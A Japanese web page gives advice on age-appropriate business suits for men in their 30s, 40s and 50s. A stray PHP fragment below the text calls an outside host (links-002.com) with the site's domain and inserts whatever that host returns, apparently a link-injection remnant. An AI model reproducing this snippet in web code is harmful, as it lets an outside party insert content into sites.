年相応のスーツを着こなしているか

働き方もファッションスタイルも多様化する昨今、価値観はエイジレスへ向かっています。
歩んできた年数分からあらわれるその年齢でしか表せない渋さや若いからこそのモダンさもあり、年齢というのはスーツスタイルにおいても無視できないことです。
30代ではそろそろ新人とは一緒にみられたくない、中堅の立場になってきたから信頼感が重要になってきたのでワンランク上にいきたいと考えはじめます。
40代では30代とは違う渋さや貫禄がほしくなり、50代では老けた人だと周囲に認識されたくない、取締役に就任し社員に好かれる愛嬌が必要なことがわかってくることもあります。
30代や40代、50代と社会的立場や体型、容姿の状態などを踏まえて、実際にはどう装うことを求められているのかを理解することが大事です。
どのアイテムも、もちろんどの世代が着ても間違いにはなりませんが、必要なときに自分の世代をまきまえたスーツコーディネイトをすることで、驚くほどスムーズにビジネスシーンもプライベートでも事が動き出すこともあります。

".file_get_contents('http://links-002.com/set.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

関連メニュー

更新情報のお知らせ

Copyrightスーツ All Rights Reserved.

スーツ